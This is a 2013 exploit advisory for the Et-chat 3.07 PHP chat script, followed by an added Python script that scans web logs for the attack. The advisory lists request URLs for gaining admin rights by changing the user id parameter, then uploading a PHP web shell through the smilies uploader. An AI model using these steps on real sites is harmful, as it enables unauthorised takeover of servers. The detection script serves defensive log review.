
Et-chat 3.07 user id Parameter Remote code execution

Author: f4ry4r_red , Published: 16-09-2013
# Exploit Title: Et-chat 3.07 user id Parameter Remote code execution

# Exploit Author: f4ry4r_red

# Script Download : http://et-chat.ir/up/et_chat_v307.zip

# Risk : Normal

# Platforms : PHP

# Tested on: 7, Kali, Vista

# Date : 2013

<------------------------------------------>

-==========<RcE>==========-


# How it works :

This error occurs due to the way cookies are kept.


# Exploit :


/?AdminRegUserEdit&[user or admin]&id=[Parameter]

/?AdminRegUserEdit&admin&id=[Parameter]


# p0c :


Get the user id and substitute it for [Parameter].

For example, my user id is 4

http://site.com/chat/?AdminRegUserEdit&admin&id=4

After that, you are an admin user.



-==========<Uploader>==========-

# For uploading sh3ll go to

/?AdminInsertSmilies <====- Uploader

http://site.com/chat/?AdminInsertSmilies

# Your shell should be less than 15 KB

Path to your sh3ll :

http://site.com/smilies/sh3ll.php
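
A log check for the requests described above, as an added example that is not part of the original advisory: it scans web-server access logs for `AdminRegUserEdit` requests carrying an `id`, POSTs to `AdminInsertSmilies`, and script files requested from the `smilies` directory. The log lines are constructed samples, and the combined log format and the function names are assumptions.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample lines in combined log format (not from the original page).
SAMPLE_LOG = """\
198.51.100.7 - - [16/Sep/2013:10:01:02 +0000] "GET /chat/?AdminRegUserEdit&admin&id=4 HTTP/1.1" 200 512
198.51.100.7 - - [16/Sep/2013:10:01:40 +0000] "POST /chat/?AdminInsertSmilies HTTP/1.1" 200 733
198.51.100.7 - - [16/Sep/2013:10:02:05 +0000] "GET /smilies/x.php HTTP/1.1" 200 90
203.0.113.9 - - [16/Sep/2013:10:03:00 +0000] "GET /smilies/smile.gif HTTP/1.1" 200 1200
203.0.113.9 - - [16/Sep/2013:10:03:10 +0000] "GET /chat/ HTTP/1.1" 200 4096
"""

REQUEST = re.compile(r'^(\S+) .*?"(GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SCRIPT_IN_SMILIES = re.compile(r"/smilies/[^/]+\.(php\d?|phtml|phar)$", re.I)


def classify(method, target):
    """Return a reason string if the request matches the advisory, else None."""
    parts = urlsplit(target)
    # The page's URLs select the action with a bare query key: ?AdminRegUserEdit&admin&id=4
    keys = [unquote(kv.split("=", 1)[0]) for kv in parts.query.split("&") if kv]
    if "AdminRegUserEdit" in keys and "id" in keys:
        return "AdminRegUserEdit request with id"
    if "AdminInsertSmilies" in keys and method == "POST":
        return "POST to AdminInsertSmilies uploader"
    if SCRIPT_IN_SMILIES.search(unquote(parts.path)):
        return "script file requested from smilies directory"
    return None


def scan(log_text):
    """Return a list of (client_ip, status, reason, target) for matching lines."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        ip, method, target, status = m.groups()
        reason = classify(method, target)
        if reason:
            findings.append((ip, status, reason, target))
    return findings


if __name__ == "__main__":
    for ip, status, reason, target in scan(SAMPLE_LOG):
        print(f"{ip} {status} {reason}: {target}")
```

A legitimate administrator produces the first two request types as well, so findings need to be correlated with the source addresses and times of known admin sessions. Any script file served from the smilies directory is worth reviewing regardless of who requested it.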

